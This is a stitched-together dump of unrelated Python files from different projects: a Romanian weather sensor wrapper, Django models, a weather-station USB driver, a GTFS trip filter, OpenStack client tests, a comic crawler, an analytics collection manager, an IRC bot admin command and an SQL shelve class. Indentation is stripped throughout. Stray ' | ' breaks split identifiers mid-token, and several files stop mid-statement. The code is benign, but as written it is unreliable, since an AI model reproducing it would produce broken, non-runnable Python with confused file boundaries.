from virtualisation.wrapper.abstractwrapper import AbstractComposedWrapper, AbstractWrapper
from virtualisation.sensordescription import SensorDescription
from virtualisation.wrapper.history.csvhistory import CSVHistoryReader
from virtualisation.wrapper.parser.csvparser import CSVParser
from virtualisation.wrapper.parser.jsonparser import JSONParser
from virtualisation.misc.log import Log
from virtualisation.wrapper.connection.httpconnection import HttpPullConnection
# from virtualisation.wrapper.splitter.abstractsplitter import AbstractSplitter
import os.path
import uuid
import urllib
def niceFilename(org):
return org.replace('(', '_').replace(')', '_').replace(' ', '_').replace('/', '_').lower()
class RomaniaWeatherConnection(HttpPullConnection):
def __init__(self, wrapper):
super(RomaniaWeatherConnection, self).__init__(wrapper)
def next(self):
data = super(RomaniaWeatherConnection, self).next()
if not data or data.strip() == "Measurement not available":
return None
else:
return data
class InternalWeatherAWWrapper(AbstractWrapper):
def __init__(self, sensorDescription):
super(InternalWeatherAWWrapper, self).__init__()
self.sensorDescription = sensorDescription
self.parser = JSONParser(self)
self.connection = RomaniaWeatherConnection(self)
def getSensorDescription(self):
return self.sensorDescription
def start(self):
if self.replaymode:
try:
self.historyreader = CSVHistoryReader(self, AbstractWrapper.getFileObject(__file__, o | s.path.join("historicdata", "weatherAW-%s.csv" % self.sensorDescription.sensorID), "rU"), delimiter=';')
self.historyparser = CSVParser(self, self.historyreader.headers)
except Exception as e:
Log.e(e)
self. | historyreader = None
super(InternalWeatherAWWrapper, self).start()
class RomanianWeatherAWWrapper(AbstractComposedWrapper):
def __init__(self):
super(RomanianWeatherAWWrapper, self).__init__()
basesensordescription = SensorDescription()
basesensordescription.namespace = "http://ict-citypulse.eu/"
basesensordescription.author = "cityofbrasov"
basesensordescription.sensorType = "Romanian_Weather"
basesensordescription.graphName = "romanian_weather#"
basesensordescription.sourceType = "pull_http"
basesensordescription.sourceFormat = "application/json"
basesensordescription.information = "Weather data of Romania"
basesensordescription.countryName = "Romania"
basesensordescription.movementBuffer = 3
basesensordescription.updateInterval = 60 * 60
basesensordescription.maxLatency = 2
basesensordescription.fields = ["aqisitionStation", "precipitations", "temperature", "timestamp", "wind"]
basesensordescription.field.aqisitionStation.propertyName = "Property"
basesensordescription.field.aqisitionStation.propertyPrefix = "ssn"
basesensordescription.field.aqisitionStation.propertyURI = basesensordescription.namespace + "romania/weather#Station"
basesensordescription.field.aqisitionStation.min = ""
basesensordescription.field.aqisitionStation.max = ""
basesensordescription.field.aqisitionStation.dataType = "str"
basesensordescription.field.aqisitionStation.showOnCityDashboard = True
basesensordescription.field.precipitations.propertyName = "Property"
basesensordescription.field.precipitations.propertyPrefix = "ssn"
basesensordescription.field.precipitations.propertyURI = \
basesensordescription.namespace + "romania/weather#Precipitation"
basesensordescription.field.precipitations.unit = basesensordescription.namespace + "unit:millimeter"
basesensordescription.field.precipitations.min = 0
basesensordescription.field.precipitations.max = 100
basesensordescription.field.precipitations.dataType = "float"
basesensordescription.field.precipitations.showOnCityDashboard = True
basesensordescription.field.precipitations.aggregationMethod = "sax"
basesensordescription.field.precipitations.aggregationConfiguration = {"alphabet_size": 5, "word_length": 3,
"unit_of_window": "hours", "window_duration": 1}
basesensordescription.field.temperature.propertyName = "Temperature"
basesensordescription.field.temperature.propertyURI = basesensordescription.namespace + "romania/weather#Temperature"
basesensordescription.field.temperature.unit = basesensordescription.namespace + "unit:degreecelsius"
basesensordescription.field.temperature.min = -40
basesensordescription.field.temperature.max = 70
basesensordescription.field.temperature.dataType = "int"
basesensordescription.field.temperature.showOnCityDashboard = True
basesensordescription.field.temperature.aggregationMethod = "sax"
basesensordescription.field.temperature.aggregationConfiguration = {"alphabet_size": 5, "word_length": 3,
"unit_of_window": "hours", "window_duration": 1}
basesensordescription.field.wind.propertyName = "WindSpeed"
basesensordescription.field.wind.propertyURI = basesensordescription.namespace + "romania/weather#WindSpeed"
basesensordescription.field.wind.unit = basesensordescription.namespace + "unit:km-per-hour"
basesensordescription.field.wind.min = 0
basesensordescription.field.wind.max = 50
basesensordescription.field.wind.dataType = "int"
basesensordescription.field.wind.showOnCityDashboard = True
basesensordescription.field.wind.aggregationMethod = "sax"
basesensordescription.field.wind.aggregationConfiguration = {"alphabet_size": 5, "word_length": 3,
"unit_of_window": "hours", "window_duration": 1}
basesensordescription.field.timestamp.propertyName = "MeasuredTime"
basesensordescription.field.timestamp.propertyURI = basesensordescription.namespace + "city#MeasuredTime"
basesensordescription.field.timestamp.unit = basesensordescription.namespace + "unit:time"
basesensordescription.field.timestamp.min = 0
basesensordescription.field.timestamp.max = 9999999999999
basesensordescription.field.timestamp.dataType = "long"
basesensordescription.field.timestamp.skip_annotation = True
basesensordescription.timestamp.inField = "timestamp"
basesensordescription.timestamp.format = "UNIX5"
locations = {
"Arad": "POINT(21.31 46.19)",
"Bacau": "POINT(26.91 46.57)",
"Baia Mare": "POINT(23.57 47.65)",
"Barlad": "POINT(27.67 46.23)",
"Bistrita": "POINT(24.04 45.19)",
"Botosani": "POINT(26.67 47.75)",
"Braila": "POINT(27.97 45.28)",
"Brasov": "POINT(25.60 45.65)",
"Bucuresti": "POINT(26.1 44.44)",
"Buzau": "POINT(26.82 45.15)",
"Calarasi": "POINT(23.85 46.48)",
"Cluj-Napoca": "POINT(23.61 46.78)",
"Constanta": "POINT(28.63 44.18)",
"Craiova": "POINT(23.8 44.32)",
"Deva": "POINT(22.9 45.88)",
"Drobeta Turnu Severin": "POINT(22.66 44.63)",
"Focsani": "POINT(27.18 45.69)",
"Galati": "POINT(28.04 45.44)",
"Iasi": "POINT(27.58 47.16)",
"Ploiesti": "POINT(26.02 44.94)",
"Piatra-Neamt": "POINT(26.37 46.93)",
"Ramnicu Valcea": "POINT(24.37 45.10)",
"Roman": "POINT(26.92 46.92)",
"Satu Mare": "POINT(22.88 47.78)",
"Sibiu": "POINT(24.15 45.79)",
"Slatina": "POINT(24.36 44.42)",
"Suceava": "POINT(26.15 47.60)",
"Targu-Mures": "POINT(24.55 46.54)",
|
NORCatUofC/rainapp | csos/models.py | Python | mit | 694 | 0 | from django.db import models
class RiverOutfall(models.Model):
name = models.TextField()
lat = models.FloatField(null=True)
lon = models.FloatField(null=True)
class RiverCso(models.Model):
r | iver_outfall = models.ForeignKey("RiverOutfall")
open_time = models.DateTimeField()
close_time = models.DateTimeField()
class LakeOutfall(models.Model):
name = models.TextField()
lat = models.FloatField(null=True)
lon = models.FloatField(null=True)
class LakeReversal(models.Model):
lake_outfall = models.ForeignKey("LakeOutfall")
open_date = models.DateTimeField()
close_date = models.Date | TimeField()
millions_of_gallons = models.FloatField()
|
sai9/weewx-gitsvn | bin/weewx/drivers/te923.py | Python | gpl-3.0 | 39,957 | 0.001652 | #!/usr/bin/env python
# $Id$
# Copyright 2013 Matthew Wall
# See the file LICENSE.txt for your full rights.
#
# Thanks to Sebastian John for the te923tool written in C (v0.6.1):
# http://te923.fukz.org/
# Thanks to Mark Teel for the te923 implementation in wview:
# http://www.wviewweather.com/
"""Classes and functions for interfacing with te923 weather stations.
These stations were made by Hideki and branded as Honeywell, Meade, IROX Pro X,
Mebus TE923, and TFA Nexus. They date back to at least 2007 and are still
sold (sparsely in the US, more commonly in Europe) as of 2013.
Apparently there are at least two different memory sizes. One version can
store about 200 records, a newer version can store about 3300 records.
The firmware version of each component can be read by talking to the station,
assuming that the component has a wireless connection to the station, of
course.
To force connection between station and sensors, press and hold DOWN button.
To reset all station parameters:
- press and hold SNOOZE and UP for 4 seconds
- press SET button; main unit will beep
- wait until beeping stops
- remove batteries and wait 10 seconds
- reinstall batteries
From the Meade TE9233W manual (TE923W-M_IM(ENG)_BK_010511.pdf):
Remote temperature/humidty sampling interval: 10 seconds
Remote temperature/humidity transmit interval: about 47 seconds
Indoor temperature/humidity sampling interval: 10 seconds
Indoor pressure sampling interval: 20 minutes
Rain counter transmitting interval: 183 seconds
Wind direction transmitting interval: 33 seconds
Wind/Gust speed display update interval: 33 seconds
Wind/Gust sampling interval: 11 seconds
UV transmitting interval: 300 seconds
Rain counter resolution: 0.03 in (0.6578 mm)
Battery statu | s of each sensor is checked every ho | ur
This implementation polls the station for data. Use the polling_interval to
control the frequency of polling. Default is 10 seconds.
The manual says that a single bucket tip is 0.03 inches. In reality, a single
bucket tip is between 0.02 and 0.03 in (0.508 to 0.762 mm). This driver uses
a value of 0.02589 in (0.6578 mm) per bucket tip.
The station has altitude, latitude, longitude, and time.
Notes From/About Other Implementations
Apparently te923tool came first, then wview copied a bit from it. te923tool
provides more detail about the reason for invalid values, for example, values
out of range versus no link with sensors.
There are some disagreements between the wview and te923tool implementations.
From the te923tool:
- reading from usb in 8 byte chunks instead of all at once
- length of buffer is 35, but reads are 32-byte blocks
- windspeed and windgust state can never be -1
- index 29 in rain count, also in wind dir
From wview:
- wview does the 8-byte reads using interruptRead
- wview ignores the windchill value from the station
- wview treats the pressure reading as barometer (SLP), then calculates the
station pressure and altimeter pressure
Memory Map
0x002001 - current readings
0x000098 - firmware versions
1 - barometer
2 - uv
3 - rcc
4 - wind
5 - system
0x00004c - battery status
- rain
- wind
- uv
- 5
- 4
- 3
- 2
- 1
0x0000fb - records
Random Notes
Here are some tidbits for usb putzing. The documentation for reading/writing
USB in python is scarce. Apparently there are (at least) two ways of reading
from USB - one using interruptRead, the other doing bulk reads. Which you use
may depend on the device itself.
There are at least two Python interfaces, e.g. claim_interface vs
claimInterface.
usb_control_msg(0x21, # request type
0x09, # request
0x0200, # value
0x0000, # index
buf, # buffer
0x08, # size
timeout) # timeout
"""
# TODO: figure out how to set station time, if possible
# TODO: figure out how to read altitude from station
# TODO: figure out how to read station pressure from station
# TODO: figure out how to clear station memory
# TODO: figure out how to detect station memory size
# TODO: figure out how to modify the archive interval
# TODO: figure out how to read the archive interval
# TODO: figure out how to read lat/lon from station
# TODO: clear rain total
# TODO: get enumeration of usb.USBError codes to handle errors better
# TODO: consider open/close on each read instead of keeping open
# TODO: sensor data use 32 bytes, but each historical record is 38 bytes. what
# do the other 4 bytes represent?
# FIXME: speed up transfers:
# date;PYTHONPATH=bin python bin/weewx/drivers/te923.py --records 0 > b; date
# Tue Nov 26 10:37:36 EST 2013
# Tue Nov 26 10:46:27 EST 2013
# date; /home/mwall/src/te923tool-0.6.1/te923con -d > a; date
# Tue Nov 26 10:46:52 EST 2013
# Tue Nov 26 10:47:45 EST 2013
from __future__ import with_statement
import syslog
import time
import usb
import weewx.drivers
import weewx.wxformulas
DRIVER_NAME = 'TE923'
DRIVER_VERSION = '0.12'
def loader(config_dict, engine):
return TE923Driver(**config_dict[DRIVER_NAME])
def configurator_loader(config_dict):
return TE923Configurator()
def confeditor_loader():
return TE923ConfEditor()
DEBUG_READ = 0
DEBUG_DECODE = 0
DEBUG_PRESSURE = 0
# map the 5 remote sensors to columns in the database schema
DEFAULT_SENSOR_MAP = {
'outTemp': 't_1',
'outHumidity': 'h_1',
'extraTemp1': 't_2',
'extraHumid1': 'h_2',
'extraTemp2': 't_3',
'extraHumid2': 'h_3',
'extraTemp3': 't_4',
# WARNING: the following are not in the default schema
'extraHumid3': 'h_4',
'extraTemp4': 't_5',
'extraHumid4': 'h_5',
}
DEFAULT_BATTERY_MAP = {
'txBatteryStatus': 'batteryUV',
'windBatteryStatus': 'batteryWind',
'rainBatteryStatus': 'batteryRain',
'outTempBatteryStatus': 'battery1',
# WARNING: the following are not in the default schema
'extraBatteryStatus1': 'battery2',
'extraBatteryStatus2': 'battery3',
'extraBatteryStatus3': 'battery4',
'extraBatteryStatus4': 'battery5',
}
def logmsg(dst, msg):
syslog.syslog(dst, 'te923: %s' % msg)
def logdbg(msg):
logmsg(syslog.LOG_DEBUG, msg)
def loginf(msg):
logmsg(syslog.LOG_INFO, msg)
def logcrt(msg):
logmsg(syslog.LOG_CRIT, msg)
def logerr(msg):
logmsg(syslog.LOG_ERR, msg)
class TE923ConfEditor(weewx.drivers.AbstractConfEditor):
@property
def default_stanza(self):
return """
[TE923]
# This section is for the Hideki TE923 series of weather stations.
# The station model, e.g., 'Meade TE923W' or 'TFA Nexus'
model = TE923
# The driver to use:
driver = weewx.drivers.te923
# The default configuration associates the channel 1 sensor with outTemp
# and outHumidity. To change this, or to associate other channels with
# specific columns in the database schema, use the following maps.
[[sensor_map]]
# Map the remote sensors to columns in the database schema.
outTemp = t_1
outHumidity = h_1
extraTemp1 = t_2
extraHumid1 = h_2
extraTemp2 = t_3
extraHumid2 = h_3
extraTemp3 = t_4
# WARNING: the following are not in the default schema
extraHumid3 = h_4
extraTemp4 = t_5
extraHumid4 = h_5
[[battery_map]]
txBatteryStatus = batteryUV
windBatteryStatus = batteryWind
rainBatteryStatus = batteryRain
outTempBatteryStatus = battery1
# WARNING: the following are not in the default schema
extraBatteryStatus1 = battery2
extraBatteryStatus2 = battery3
extraBatteryStatus3 = battery4
extraBatteryStatus4 = battery5
"""
class TE923Configurator(weewx.drivers.AbstractConfigurator):
@property
def version(self):
return DRIVER_VERSION
def add_options(self, parser):
super(TE923Configurator, self).add_options(parser)
parser.add_option("--info", dest="info", action="store_true",
help="display weather station configuration")
parser.add_option("--current", dest="current", action |
jonpetersen/transitfeed-1.2.12 | build/scripts-2.7/unusual_trip_filter.py | Python | apache-2.0 | 5,999 | 0.010502 | #!/usr/bin/python
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Filters out trips which are not on the defualt routes and
set their trip_typeattribute accordingly.
For usage information run unusual_trip_filter.py --help
"""
__author__ = 'Jiri Semecky <jiri.semecky@gmail.com>'
import codecs
import os
import os.path
import sys
import time
import transitfeed
from transitfeed import util
class UnusualTripFilter(object):
"""Class filtering trips going on unusual paths.
Those are usually trips going to/from depot or changing to another route
in the middle. Sets the 'trip_type' attribute of the trips.txt dataset
so that non-standard trips are marked as special (value 1)
instead of regular (default value 0).
"""
def __init__ (self, threshold=0.1, force=False, quiet=False, route_type=None):
self._threshold = threshold
self._quiet = quiet
self._force = force
if route_type in transitfeed.Route._ROUTE_TYPE_NAMES:
self._route_type = transitfeed.Route._ROUTE_TYPE_NAMES[route_type]
elif route_type is None:
self._route_type = None
else:
self._route_type = int(route_type)
def filter_line(self, route):
"""Mark unusual trips for the given route."""
if self._route_type is not None and self._route_type != route.route_type:
self.info('Skipping route %s due to different route_type value (%s)' %
(route['route_id'], route['route_type']))
return
self.info('Filtering infrequent trips for route %s.' % route.route_id)
trip_count = len(route.trips)
for pattern_id, pattern in route.GetPatternIdTripDict().items():
ratio = float(1.0 * len(pattern) / trip_count)
if not self._force:
if (ratio < self._threshold):
self.info("\t%d trips on route %s with headsign '%s' recognized "
"as unusual (ratio %f)" %
(len(pattern),
route['route_short_name'],
pattern[0]['trip_headsign'],
ratio))
for trip in pattern:
trip.trip_type = 1 # special
self.info("\t\tsetting trip_type of trip %s as special" %
trip.trip_id)
else:
self.info("\t%d trips on route %s with headsign '%s' recognized "
"as %s (ratio %f)" %
(len(pattern),
route['route_short_name'],
pattern[0]['trip_headsign'],
('regular', 'unusual')[ratio < self._threshold],
ratio))
for trip in pattern:
trip.trip_type = ('0','1')[ratio < self._threshold]
self.info("\t\tsetting trip_type of trip %s as %s" %
(trip.trip_id,
('regular', 'unusual')[ratio < self._threshold]))
def filter(self, dataset):
"""Mark unusual trips for all the routes in the dataset."""
self.info('Going to filter infrequent routes in the dataset')
for route in dataset.routes.values():
self.filter_line(route)
def info(self, text):
if not self._quiet:
print text.encode("utf-8")
def main():
u | sage = \
'''%prog [options] <GTFS.zip>
Sets the trip_type for trips that have an unusual pattern for a route.
<GTFS.zip> is overwritten with the modifed GTFS file unless the --output
option is used.
For more information see
http://code.google.com/p/googletransitdatafeed/wiki/UnusualTripFilter
'''
p | arser = util.OptionParserLongError(
usage=usage, version='%prog '+transitfeed.__version__)
parser.add_option('-o', '--output', dest='output', metavar='FILE',
help='Name of the output GTFS file (writing to input feed if omitted).')
parser.add_option('-m', '--memory_db', dest='memory_db', action='store_true',
help='Force use of in-memory sqlite db.')
parser.add_option('-t', '--threshold', default=0.1,
dest='threshold', type='float',
help='Frequency threshold for considering pattern as non-regular.')
parser.add_option('-r', '--route_type', default=None,
dest='route_type', type='string',
help='Filter only selected route type (specified by number'
'or one of the following names: ' + \
', '.join(transitfeed.Route._ROUTE_TYPE_NAMES) + ').')
parser.add_option('-f', '--override_trip_type', default=False,
dest='override_trip_type', action='store_true',
help='Forces overwrite of current trip_type values.')
parser.add_option('-q', '--quiet', dest='quiet',
default=False, action='store_true',
help='Suppress information output.')
(options, args) = parser.parse_args()
if len(args) != 1:
parser.error('You must provide the path of a single feed.')
filter = UnusualTripFilter(float(options.threshold),
force=options.override_trip_type,
quiet=options.quiet,
route_type=options.route_type)
feed_name = args[0]
feed_name = feed_name.strip()
filter.info('Loading %s' % feed_name)
loader = transitfeed.Loader(feed_name, extra_validation=True,
memory_db=options.memory_db)
data = loader.Load()
filter.filter(data)
print 'Saving data'
# Write the result
if options.output is None:
data.WriteGoogleTransitFeed(feed_name)
else:
data.WriteGoogleTransitFeed(options.output)
if __name__ == '__main__':
util.RunWithCrashHandler(main)
|
vichoward/python-neutronclient | neutronclient/tests/unit/test_name_or_id.py | Python | apache-2.0 | 5,590 | 0 | # Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import uuid
import mox
import testtools
from neutronclient.common import exceptions
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.tests.unit import test_cli20
from neutronclient.v2_0 import client
class CLITestNameorID(testtools.TestCase):
def setUp(self):
"""Prepare the test environment."""
super(CLITestNameorID, self).setUp()
self.mox = mox.Mox()
self.endurl = test_cli20.ENDURL
self.client = client.Client(token=test_cli20.TOKEN,
endpoint_url=self.endurl)
self.addCleanup(self.mox.VerifyAll)
self.addCleanup(self.mox.UnsetStubs)
def test_get_id_from_id(self):
_id = str(uuid.uuid4())
reses = {'networks': [{'id': _id, }, ], }
resstr = self.client.serialize(reses)
self.mox.StubOutWithMock(self.client.httpcl | ient, "request")
path = getattr(self.client, "networks_path")
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&id=" + _id), 'GET',
body=None,
headers=mox.ContainsKeyV | alue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr))
self.mox.ReplayAll()
returned_id = neutronV20.find_resourceid_by_name_or_id(
self.client, 'network', _id)
self.assertEqual(_id, returned_id)
def test_get_id_from_id_then_name_empty(self):
_id = str(uuid.uuid4())
reses = {'networks': [{'id': _id, }, ], }
resstr = self.client.serialize(reses)
resstr1 = self.client.serialize({'networks': []})
self.mox.StubOutWithMock(self.client.httpclient, "request")
path = getattr(self.client, "networks_path")
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&id=" + _id), 'GET',
body=None,
headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr1))
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&name=" + _id), 'GET',
body=None,
headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr))
self.mox.ReplayAll()
returned_id = neutronV20.find_resourceid_by_name_or_id(
self.client, 'network', _id)
self.assertEqual(_id, returned_id)
def test_get_id_from_name(self):
name = 'myname'
_id = str(uuid.uuid4())
reses = {'networks': [{'id': _id, }, ], }
resstr = self.client.serialize(reses)
self.mox.StubOutWithMock(self.client.httpclient, "request")
path = getattr(self.client, "networks_path")
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&name=" + name), 'GET',
body=None,
headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr))
self.mox.ReplayAll()
returned_id = neutronV20.find_resourceid_by_name_or_id(
self.client, 'network', name)
self.assertEqual(_id, returned_id)
def test_get_id_from_name_multiple(self):
name = 'myname'
reses = {'networks': [{'id': str(uuid.uuid4())},
{'id': str(uuid.uuid4())}]}
resstr = self.client.serialize(reses)
self.mox.StubOutWithMock(self.client.httpclient, "request")
path = getattr(self.client, "networks_path")
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&name=" + name), 'GET',
body=None,
headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr))
self.mox.ReplayAll()
try:
neutronV20.find_resourceid_by_name_or_id(
self.client, 'network', name)
except exceptions.NeutronClientNoUniqueMatch as ex:
self.assertTrue('Multiple' in ex.message)
def test_get_id_from_name_notfound(self):
name = 'myname'
reses = {'networks': []}
resstr = self.client.serialize(reses)
self.mox.StubOutWithMock(self.client.httpclient, "request")
path = getattr(self.client, "networks_path")
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&name=" + name), 'GET',
body=None,
headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr))
self.mox.ReplayAll()
try:
neutronV20.find_resourceid_by_name_or_id(
self.client, 'network', name)
except exceptions.NeutronClientException as ex:
self.assertTrue('Unable to find' in ex.message)
self.assertEqual(404, ex.status_code)
|
HiSchoolProject/BackSchool | manage.py | Python | lgpl-3.0 | 1,016 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hischool.settings")
# Add the "core" and "extensions" folders to the path
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "extensions"))
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "core"))
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Pyth | on 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environ | ment?"
)
raise
execute_from_command_line(sys.argv)
|
jodal/comics | comics/comics/tehgladiators.py | Python | agpl-3.0 | 765 | 0 | from comics.aggregator.crawler import CrawlerBase, CrawlerImage
from comics.core.comic_data import ComicDataBase
class ComicData(ComicDataBase):
name = "Teh Gladiators"
language = "en"
url = "http://www.tehgladiators.c | om/"
start_date = "2008-03-18"
rights = "Uros Jojic & Borislav Grabovic"
class Crawler(CrawlerBase):
history_capable_days = 90
| schedule = "We"
time_zone = "Europe/Belgrade"
def crawl(self, pub_date):
feed = self.parse_feed("http://www.tehgladiators.com/rss.xml")
for entry in feed.for_date(pub_date):
page = self.parse_page(entry.link)
url = page.src('img[alt^="Teh Gladiators Webcomic"]')
title = entry.title
return CrawlerImage(url, title)
|
JuezUN/INGInious | inginious/frontend/plugins/analytics/analytics_collection_manager.py | Python | agpl-3.0 | 2,152 | 0 | class AnalyticsCollectionManagerSingleton:
""" This Singleton class manages the DBs analytics collection. """
__instance = None
@staticmethod
def get_instance(db=None):
""" Static access method. """
if not AnalyticsCollectionManagerSingleton.__instance:
AnalyticsCollectionManagerSingleton(db)
return AnalyticsCollectionManagerSingleton.__instance
def __init__(self, database):
""" Virtually private constructor. """
if AnalyticsCollectionManagerSingleton.__instance:
raise Exception("This class is a singleton!")
else:
self.db = database
AnalyticsCollectionManagerSingleton.__instance = self
def add_visit(self, service, username, date, session_id, course_id):
""" Adds record of visit to a service """
return self.db.analytics.insert({'username': username,
'service': service["key"],
'date': date,
'session_id': session_id,
'course_id': course_id})
def check_record(self, record_id):
return self.db.analytics.find_one({'_id': record_id})
def check_user_records(self, username):
return self.db.analytics.find({'username': username})
def get_course_records(self, course_id):
return self.db.analytics.find({'course_id': course_id})
def _reset_records(self):
self.db.analytics.drop()
def get_course_list(self):
""" return a list of the courses registered in analytics """
return self.db.analytics.distinct("course_id")
def filter_analytics_data(self, filters):
| """ get data from DB according the filters """
results | = self.db.analytics.aggregate([
{
"$match": filters
},
{
"$project": {
"username": 1,
"service": 1,
"date": 1,
"course_id": 1
}
}
])
return results
|
MatthewCox/PyMoronBot | pymoronbot/modules/admin/Admin.py | Python | mit | 5,227 | 0.001531 | # -*- coding: utf-8 -*-
"""
Created on Feb 09, 2018
@author: Tyranic-Moron
"""
from twisted.plugin import IPlugin
from pymoronbot.moduleinterface import IModule
from pymoronbot.modules.commandinterface import BotCommand, admin
from zope.interface import implementer
import re
from collections import OrderedDict
from pymoronbot.response import IRCResponse, ResponseType
@implementer(IPlugin, IModule)
class Admin(BotCommand):
def triggers(self):
return ['admin']
@admin("Only my admins may add new admins!")
def _add(self, message):
"""add <nick/full hostmask> - adds the specified user to the bot admins list.
You can list multiple users to add them all at once.
Nick alone will be converted to a glob hostmask, eg: *!user@host"""
if len(message.ParameterList) < 2:
return IRCResponse(ResponseType.Say,
u"You didn't give me a user to add!",
message.ReplyTo)
for admin in message.ParameterList[1:]:
if message.ReplyTo in self.bot.channels:
if admin in self.bot.channels[message.ReplyTo].Users:
user = self.bot.channels[message.ReplyTo].Users[admin]
admin = u'*!{}@{}'.format(user.User, user.Hostmask)
admins = self.bot.config.getWithDefault('admins', [])
admins.append(admin)
self.bot.config['admins'] = admins
self.bot.config.writeConfig()
return IRCResponse(ResponseType.Say,
u"Added specified users as bot admins!",
message.ReplyTo)
@admin("Only my admins may remove admins!")
def _del(self, message):
"""del <full hostmask> - removes the specified user from the bot admins list.
You can list multiple users to remove them all at once."""
if len(message.ParameterList) < 2:
return IRCResponse(ResponseType.Say,
u"You didn't give me a user to remove!",
message.ReplyTo)
deleted = []
skipped = []
admins = self.bot.config.getWithDefault('admins', [])
for admin in message.ParameterList[1:]:
if message.ReplyTo in self.bot.channels:
if admin in self.bot.channels[message.ReplyTo].Users:
user = self.bot.channels[message.ReplyTo].Users[admin]
admin = u'*!{}@{}'.format(user.User, user.Hostmask)
if admin not in admins:
skipped.append(admin)
continue
admins.remove(admin)
deleted.append(admin)
self.bot.config['admins'] = admins
self.bot.config.writeConfig()
return IRCResponse(ResponseType.Say,
u"Removed '{}' as admin(s), {} skipped"
.format(u', '.join(deleted), len(skipped)),
message.ReplyTo)
def _list(self, message):
"""list - lists all admins"""
owners = self.bot.config.getWithDefault('owners', [])
admins = self.bot.config.getWithDefault('admins', [])
return IRCResponse(ResponseType.Say,
u"Owners: {} | Admins: {}".format(u', '.join(owners),
u', '.join(admins)),
message.ReplyTo)
subCommands = OrderedDict([
(u'add', _add),
(u'del', _del),
(u'list', _list)])
def help(self, query):
"""
@type query: list[str]
@rtype str
"""
if len(query) > 1:
subCommand = query[1].lower()
if subCommand in self.subCommands:
return u'{1}admin {0}'.format(re.sub(r"\s+", u" ", self.subCommands[subCommand].__doc__),
self.bot.commandChar)
else:
return self._unrecognizedSubcommand(subCommand)
else:
return self._helpText()
def _helpText(self):
return u"{1}admin ({0}) - manages users with bot admin permissions. " \
u"Use '{1}help admi | n <subcommand> for subcommand help.".format(u'/'.join(self.subCommands.keys()),
self.bot.commandChar)
def _unrecognizedSubcommand(self, subCommand):
return u"unrecognized subcommand '{}', " \
u"available subcommands for admin are: {}".format(subCo | mmand, u', '.join(self.subCommands.keys()))
def execute(self, message):
if len(message.ParameterList) > 0:
subCommand = message.ParameterList[0].lower()
if subCommand not in self.subCommands:
return IRCResponse(ResponseType.Say,
self._unrecognizedSubcommand(subCommand),
message.ReplyTo)
return self.subCommands[subCommand](self, message)
else:
return IRCResponse(ResponseType.Say,
self._helpText(),
message.ReplyTo)
adminCommand = Admin()
|
Mafarricos/Mafarricos-modded-xbmc-addons | plugin.video.streamajoker/resources/site-packages/streamajoker/__init__.py | Python | gpl-2.0 | 92 | 0 | from streamajok | er.plugin import plugin
from streamajoker import common, cm | d, library, index
|
flynx/pli | pli/persistance/sql/shelve.py | Python | bsd-3-clause | 2,359 | 0.038576 | #=======================================================================
__version__ = '''0.0.01'''
__sub_version__ = '''20070108034250'''
__copyright__ = '''(c) Alex A. Naanou 2003'''
#-----------------------------------------------------------------------
import pli.pattern.mixin.mapping as mapping
#-----------------------------------------------------------SQLShelve---
##!!!
# XXX should this be live???
class SQLShelve(mapping.Mapping):
'''
'''
# TODO make this create a new dict for the id if one is not
# present.... (might be a good idea to use some other id
# method...)
# one alternative id method is to create a root dict that will
# contain names of all the dicts used and their coresponding
# id's...
def __init__(self, interface, name):
'''
'''
self._interface = interface
self._name = name
# if such a name does not exist...
try:
self._data = interface.get(name)
except KeyError:
d = self._data = {}
interface.write(name, d)
##!!! sanity check: if the name refereneces a non-dict or non-dict-like...
##!!!
def __getitem__(self, name):
'''
'''
if name in self._data:
return self._interface.get(self._data[name])
raise KeyError, name
##!!! make this safe...
def __setitem__(self, name, value):
'''
'''
interface = self._interface
data = self._data
try:
# insert the object...
oid = interface.write(value)
# update the keys dict...
data[name] = oid
interface.write(data)
except:
## ##!!! rollback...
## interface.__sql_reader__.sql.connection.rollback()
raise 'oops!'
# commit...
# XXX make this prittier!
interface.__sql_reader__.sql.connection.commit()
##!!! REWRITE: might be a tad cleaner...
def __delitem__(self, name):
'''
'''
## return self._interface.delete(self._data.pop(name))
interface = self._interface
data = self._data
try:
